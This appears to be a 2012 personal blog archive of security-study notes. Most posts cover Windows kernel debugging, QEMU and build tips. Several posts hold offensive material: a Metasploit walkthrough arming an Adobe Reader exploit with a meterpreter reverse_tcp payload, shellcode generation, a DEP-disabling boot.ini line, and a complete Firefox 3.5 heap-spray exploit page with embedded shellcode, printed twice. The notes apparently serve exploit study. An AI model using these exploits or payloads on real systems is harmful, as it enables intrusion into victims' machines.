"c:\program files\internet exploder\iexplore.exe ''C:\hello.html"
Saturday, April 28, 2012
Open an website fro command prompt
"c:\program files\internet exploder\iexplore.exe 'http://www.yahoo.com'"
"c:\program files\internet exploder\iexplore.exe ''C:\hello.html"
"c:\program files\internet exploder\iexplore.exe ''C:\hello.html"
metasploit usage
1. download and intal it
2. open the metasploit console
windows: go to programs
linux: type msf<tab>, it will show your the commands
3. go to metasploit website, search a vulnerability, download the specific version of the application.
4. it will like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit
5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe
6. for this case, if your shell code executed, the calculator will show up on you screen.
2. open the metasploit console
windows: go to programs
linux: type msf<tab>, it will show your the commands
3. go to metasploit website, search a vulnerability, download the specific version of the application.
4. it will like:
msf > use exploit/windows/fileformat/adobe_reader_u3d
msf exploit(adobe_reader_u3d) > show payloads
msf exploit(adobe_reader_u3d) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(adobe_reader_u3d) > set LHOST [MY IP ADDRESS]
msf exploit(adobe_reader_u3d) > exploit
5. for example, you can set the payload as /windows/exec
msf> use exploit/....
msf> set payload windows/exec
msf> set cmd calc.exe
6. for this case, if your shell code executed, the calculator will show up on you screen.
Convert binary Shell code to Javascript percentage encoding
<html> <head> <script language="JavaScript" type="text/javascript"> function ConvertShellCode(strdata) { var s = new String(strdata); s = s.replace(/[\s\\x]/g, ''); var strcode = ''; for(var idx=0; idx<s.length; idx+=4) strcode += "%u" + s.substr(idx+2,2) + s.substr(idx+0,2); document.forms.ShellToJavascript.decode.value = strcode; } </script> </head> <body> <form name="ShellToJavascript" method="post"> <textarea rows="10" cols="100" name="encode"></textarea><br /> <textarea rows="10" cols="100" name="decode"></textarea><br /> <input type="button" value="Encode" onclick="return ConvertShellCode(document.ShellToJavascript.encode.value)" /> </form> </body> </html>
http://www.governmentsecurity.org/forum/topic/27916-shell-code-convertorencoder/
Tuesday, April 24, 2012
How to write Shell Code; Reverse Shell code
http://www.safemode.org/files/zillion/shellcode/doc/Writing_shellcode.html
use Metasploit to generate shell code
This post explains to use metasploit to generate binary shell code:
http://www.backtrack-linux.org/forums/showthread.php?t=35480
http://www.backtrack-linux.org/forums/showthread.php?t=35480
msf > use windows/exec msf payload(exec) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute EXITFUNC process yes Exit technique: seh, thread, process, none msf payload(exec) > set cmd taskkill /PID 12345 cmd => taskkill /PID 12345 msf payload(exec) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD taskkill /PID 12345 yes The command string to execute EXITFUNC process yes Exit technique: seh, thread, process, none msf payload(exec) > generate -h Usage: generate [options] Generates a payload. OPTIONS: -E Force encoding. -b <opt> The list of characters to avoid: '\x00\xff' -e <opt> The name of the encoder module to use. -f <opt> The output file name (otherwise stdout) -h Help banner. -i <opt> the number of encoding iterations. -k Keep the template executable functional -o <opt> A comma separated list of options in VAR=VAL format. -p <opt> The Platform for output. -s <opt> NOP sled length. -t <opt> The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war -x <opt> The executable template to use msf payload(exec) > generate -t exe -f /root/windows-exec-payload.exe [*] Writing 73802 bytes to /root/windows-exec-payload.exe... msf payload(exec) > generate -f /root/windows-exec-payload.shellcode [*] Writing 1013 bytes to /root/windows-exec-payload.shellcode...
Monday, April 23, 2012
User program write to IO ports on Windows
http://retired.beyondlogic.org/porttalk/porttalk.htm
Download the PortTalk 2.2 folder.
Look at the README file, you will know how to use it.
C:\porttalk>allowio beep /a
allow program beep.exe to write all the ports
C:\porttalk\AllowIO>allowio 0x42 0x43 0x61 beep.exe
allow the beep.exe to access port 0x42 0x43 and 0x61
Look at the IoExample folder, you will know how to write the sample user program to write ports.
In addition, we could use assembly IO instruction to write to port.
out dx, al
compile the assembly code into WritePort.exe file, and use AllowIo.exe to set the bitmap permission for this executable program
AllowIo.exe WritePort.exe /a
Again, AllowIo.exe provides the facility to modify the IO permission bitmap and write/read to IO ports via IOCTL calls.
Download the PortTalk 2.2 folder.
Look at the README file, you will know how to use it.
C:\porttalk>allowio beep /a
allow program beep.exe to write all the ports
C:\porttalk\AllowIO>allowio 0x42 0x43 0x61 beep.exe
allow the beep.exe to access port 0x42 0x43 and 0x61
Look at the IoExample folder, you will know how to write the sample user program to write ports.
In addition, we could use assembly IO instruction to write to port.
out dx, al
compile the assembly code into WritePort.exe file, and use AllowIo.exe to set the bitmap permission for this executable program
AllowIo.exe WritePort.exe /a
Again, AllowIo.exe provides the facility to modify the IO permission bitmap and write/read to IO ports via IOCTL calls.
Sunday, April 22, 2012
Build Firefox Source code
Download Source Code:
https://developer.mozilla.org/En/Developer_Guide/Source_Code/Downloading_Source_Archives
Compile & Build:
https://developer.mozilla.org/En/Simple_Firefox_build
https://developer.mozilla.org/en/Build_Documentation
https://developer.mozilla.org/En/Developer_Guide/Source_Code/Downloading_Source_Archives
Compile & Build:
https://developer.mozilla.org/En/Simple_Firefox_build
https://developer.mozilla.org/en/Build_Documentation
Crash CentOS...
I crashed my CentOS testing machine today. The command I run:
$ yum remove glib2
I was trying to reinstall glib2(I know there is a reinstall command, but I don't why I didn't use that one), and I removed the glib2 packet.
After I run this command, I went out for dinner.
When I came back, my System is crashed. I tried many ways to rescue, but none of them helped.
For exmaple:
reboot into another kernel.
Put the CentOS installation disk, upgrade the OS, rescue the OS.....
Finally, I reinstall the CentOS. On lucky thing is I have backed up all my data on the server.
Never never remove glib2 packet in future...
Saturday, April 21, 2012
CentOS 5.5 Download
http://mirror.teklinks.com/centos/5.5/isos/i386/
http://centos.org/modules/tinycontent/index.php?id=15
Go to CentOS website, and to download mirror list.
Some Mirror doesn't have full list of versions of CentOS. You need check one by one
http://centos.org/modules/tinycontent/index.php?id=15
Go to CentOS website, and to download mirror list.
Some Mirror doesn't have full list of versions of CentOS. You need check one by one
Memory tool on Windows
vmmap
http://technet.microsoft.com/en-us/sysinternals/dd535533
cheatengine
http://www.cheatengine.org/
http://technet.microsoft.com/en-us/sysinternals/dd535533
cheatengine
http://www.cheatengine.org/
Thursday, April 19, 2012
Run Python on Windows
1. Download the python
http://python.org/download/
2. Install it. it ususally installed at C:\Python27
3. Run it need to add the C:\Python27 to the PATH environment variable.
http://docs.python.org/faq/windows.html#how-do-i-run-a-python-program-under-windows
Add
to the PAHT environment variable at
properties window of “My Computer” under the “Advanced” tab
4. Type python from the command line
http://python.org/download/
2. Install it. it ususally installed at C:\Python27
3. Run it need to add the C:\Python27 to the PATH environment variable.
http://docs.python.org/faq/windows.html#how-do-i-run-a-python-program-under-windows
Add
;C:\Python23
to the PAHT environment variable at
properties window of “My Computer” under the “Advanced” tab
4. Type python from the command line
VMware fusion snapshot
VMware Fusion snapshot saves the whole memory image file when you take a snapshot. You can find the memory image in the VM folder.
Here are some more detailed info about VMware snapshot
http://www.vmware.com/support/ws4/doc/preserve_snapshot_ws.html
Here are some more detailed info about VMware snapshot
http://www.vmware.com/support/ws4/doc/preserve_snapshot_ws.html
OS161 Homework
Very good post on OS161 homework implementation:
http://jhshi.wordpress.com/category/os161/
Or you can find out some sample code by search: "OS161 googleproject"
http://jhshi.wordpress.com/category/os161/
Or you can find out some sample code by search: "OS161 googleproject"
Reverse Java Script Shell Code
http://pmelson.blogspot.com/2009/11/reversing-javascript-shellcode-step-by.html
It is a detailed post, but one thing I am not understand is the spider monkey part.
After using spider monkey to translate the original percentage encoding data, the result is totally different from the original data.
However, one commet of this post points out we only need to remove the "%u" and the reverse the order of original data.
Not sure which way is correct.
But it is very good post for reverse JS shell code.
BTW, I install the spider monkey on the CentOS without any problem.
It is a detailed post, but one thing I am not understand is the spider monkey part.
After using spider monkey to translate the original percentage encoding data, the result is totally different from the original data.
However, one commet of this post points out we only need to remove the "%u" and the reverse the order of original data.
Not sure which way is correct.
But it is very good post for reverse JS shell code.
BTW, I install the spider monkey on the CentOS without any problem.
Heap Spray Attack
http://1337day.com/exploits/9493
Vulnerability + NOP sleds + Shell Code
e.g., This is an exploitation HTML file targeting on Firefox 3.5.
It use heap spray attack to launch a calc.exe on Windows platforms
Same vulnerability exists on the same version firefox on Linux environment, but the shellcode needs to modified.
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw </FONT>
</p>
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray Code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>
Vulnerability + NOP sleds + Shell Code
e.g., This is an exploitation HTML file targeting on Firefox 3.5.
It use heap spray attack to launch a calc.exe on Windows platforms
Same vulnerability exists on the same version firefox on Linux environment, but the shellcode needs to modified.
<html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw </FONT>
</p>
</div>
<script language=JavaScript>
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
"%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
"%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
"%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
"%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
"%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
"%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
"%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
"%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
"%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
"%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
"%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
"%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
"%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
"%u652E%u6578%u9000");
/* Heap Spray Code */
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x40001)
{
fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++)
{
sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
function escapeData(data)
{
var i;
var c;
var escData='';
for(i=0;i<data.length;i++)
{
c=data.charAt(i);
if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
escData+=c;
}
return escData;
}
function DataTranslator(){
searchArray = new Array();
searchArray[0] = new Array();
searchArray[0]["str"] = "blah";
var newElement = document.getElementById("content")
if (document.getElementsByTagName) {
var i=0;
pTags = newElement.getElementsByTagName("p")
if (pTags.length > 0)
while (i<pTags.length)
{
oTags = pTags[i].getElementsByTagName("font")
searchArray[i+1] = new Array()
if (oTags[0])
{
searchArray[i+1]["str"] = oTags[0].innerHTML;
}
i++
}
}
}
function GenerateHTML()
{
var html = "";
for (i=1;i<searchArray.length;i++)
{
html += escapeData(searchArray[i]["str"])
}
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>
NOP sleds in Heap Spray
The NOP sleds in Heap Spray is more general. It doesn't necessary to be 0x90. It could be anything which doesn't hurt the register values or affect the shell code to run
For example
0c0c instruction: it means OR AL, 0c
Basically, the first 0c0c instruction will change the low value in EAX register, as long as it doesn't crash the program after popa instruction in shell code, it could be used as heap spray.
http://www.ask-a-pentester.com/index.php/9/about-nop-slides-in-js-heap-overflows
For example
0c0c instruction: it means OR AL, 0c
Basically, the first 0c0c instruction will change the low value in EAX register, as long as it doesn't crash the program after popa instruction in shell code, it could be used as heap spray.
http://www.ask-a-pentester.com/index.php/9/about-nop-slides-in-js-heap-overflows
Tuesday, April 17, 2012
Hacking website
Milworm: http://1337day.com/
http://www.exploit-db.com/
http://www.metasploit.com/
http://contagiodump.blogspot.com/
http://www.offensivecomputing.net/
http://www.exploit-db.com/
http://www.metasploit.com/
http://contagiodump.blogspot.com/
http://www.offensivecomputing.net/
Windows Kernel Debugging
How to set up the Windows Kernel Debugging, please see article:
http://www.blogger.com/blogger.g?blogID=6275589693478001671#editor/target=post;postID=4149230560487743600
Some useful commands:
> dt _eprocess // see the structure of eprocess
> dt _peb // process environment block
> dt _kprocess // kernel process structure
> dt _heap // heap structure
> dt _ heap_segment
> dt _heap_entry
Application debugging(e.g. firefox)
> !process 0 0 // list all the running process
> .context <dirbase_address> // this is to enable the context, and you can find the dirbase address from !process 0 0 command in firefox process info. Sometimes, you need to run command before enable the context
>.enable forcedecoderuser
> dt _peb <peb_address_of_Firefox>
> dd <address> // you can see the content of that location, like the x command in QEMU
> dd /p <address> // see the physical address content
> dt _heap <heap_address>
> dt _heap_entry <heap_entry_address>
http://www.blogger.com/blogger.g?blogID=6275589693478001671#editor/target=post;postID=4149230560487743600
Some useful commands:
> dt _eprocess // see the structure of eprocess
> dt _peb // process environment block
> dt _kprocess // kernel process structure
> dt _heap // heap structure
> dt _ heap_segment
> dt _heap_entry
Application debugging(e.g. firefox)
> !process 0 0 // list all the running process
> .context <dirbase_address> // this is to enable the context, and you can find the dirbase address from !process 0 0 command in firefox process info. Sometimes, you need to run command before enable the context
>.enable forcedecoderuser
> dt _peb <peb_address_of_Firefox>
> dd <address> // you can see the content of that location, like the x command in QEMU
> dd /p <address> // see the physical address content
> dt _heap <heap_address>
> dt _heap_entry <heap_entry_address>
Saturday, April 14, 2012
Disable PAE on Windows XP SP3
Go to computer -> properties, it will show in the hardware specification if the PAE enabled.
Enabling PAE (by setting bit 5, PAE, of the system register
Enabling PAE (by setting bit 5, PAE, of the system register
CR4
), which is the sixth bit from the left.
Disable method:
Normal boot.ini with PAE & DEP
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Micro soft Windows XP Pro x86" /noexecute=optin /fastdetect
Disabled DEP & PAE
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Micro soft Windows XP Pro x86" /execute /fastdetect
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Micro soft Windows XP Pro x86" /noexecute=optin /fastdetect
Disabled DEP & PAE
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Micro soft Windows XP Pro x86" /execute /fastdetect
__________________
Tuesday, April 10, 2012
wget in Mac
echo 'alias wget="curl -O"' >> ~/.bash_profile
curl -0 url > filename
-0 means http
save the file to filename
more see man curl
curl -0 url > filename
-0 means http
save the file to filename
more see man curl
Monday, April 9, 2012
Windows Kernel Debugging by using serial port
1. Setup two machines: target machine and debugging machie
2. Download windbg at the debugging machine
http://msdn.microsoft.com/en-us/windows/hardware/gg463009
for window XP you need to download the Windows 7 version
3. Change the boot.ini file in taget machine to recognize com1 serial port.
4. Boot target machine into debugging mode ( press F8 when booting)
5. Start windbg at the debugging machine, and choose the correct device.
e.g. Serial port to USB
6. Set the the correct symbol table path.
e.g. srv*c\symbols*http://msdl.microsoft.com/download/symbols
7. run dt _eprocess
How to change boot.ini
http://www.etdot.com/2008/04/16/windbg-and-vmware/
http://support.microsoft.com/kb/289022
You also can get more information from: Windows Internals book 5 Edition
Another book: Advanced Windows Debugging
2. Download windbg at the debugging machine
http://msdn.microsoft.com/en-us/windows/hardware/gg463009
for window XP you need to download the Windows 7 version
3. Change the boot.ini file in taget machine to recognize com1 serial port.
4. Boot target machine into debugging mode ( press F8 when booting)
5. Start windbg at the debugging machine, and choose the correct device.
e.g. Serial port to USB
6. Set the the correct symbol table path.
e.g. srv*c\symbols*http://msdl.microsoft.com/download/symbols
7. run dt _eprocess
How to change boot.ini
http://www.etdot.com/2008/04/16/windbg-and-vmware/
http://support.microsoft.com/kb/289022
You also can get more information from: Windows Internals book 5 Edition
Another book: Advanced Windows Debugging
Friday, April 6, 2012
QEMU usage menu page
http://wiki.qemu.org/download/qemu-doc.html
common commands:
stop: stop the virtual machine
c/count: resume the machine
x /20w location: see the content at location
x /20c location: see the content by character
x /fmt location: fmt could be count, format, size
xp /20w location: see the content at physical memory location
common commands:
stop: stop the virtual machine
c/count: resume the machine
x /20w location: see the content at location
x /20c location: see the content by character
x /fmt location: fmt could be count, format, size
xp /20w location: see the content at physical memory location
Tuesday, April 3, 2012
How to find PsActiveProcessHead in memory on Windows
PsActiveProcessHead is a pointer to the start of the kerne's list of _EPROCESS structures.
1. Get the FS register value: 0xffdff000, which points to the Kernel Processor Control Region (KPCR) structure
2. KDVersionBlock is at the offset 0x34 of KPCR
3. Get the KdVersionBlock value: 0x8054c738 (run x /20w 0xffdff034 in QEMU monitor)
4. PsActiveProcessHead is at the offset 0x78 of KdVersionBlock, which is at location 0x8054c7b0
5. Get the PsActiveProcessHead value: 0x80560bd8 ( run x /20w 0x8054c7b0)
6. See the LIST_ENTRY field of PsActiveProcessHead, and it is a double linked list.
7. See the process name ( run x /20c location)
7. See the process name ( run x /20c location)
More Info:
http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf
Monday, April 2, 2012
Find useful memory in windows
http://www.reverse-engineering.info/SystemInformation/GetVarXP.pdf
http://forum.sysinternals.com/devphysicalmemoryfinding-my-peb_topic3473.html
http://moyix.blogspot.com/2008/04/finding-kernel-global-variables-in.html
http://forum.sysinternals.com/devphysicalmemoryfinding-my-peb_topic3473.html
http://moyix.blogspot.com/2008/04/finding-kernel-global-variables-in.html
http://www.facultyresourcecenter.com/curriculum/ResourceKits/Default.aspx?c1=en-us&c2=0
Subscribe to:
Posts (Atom)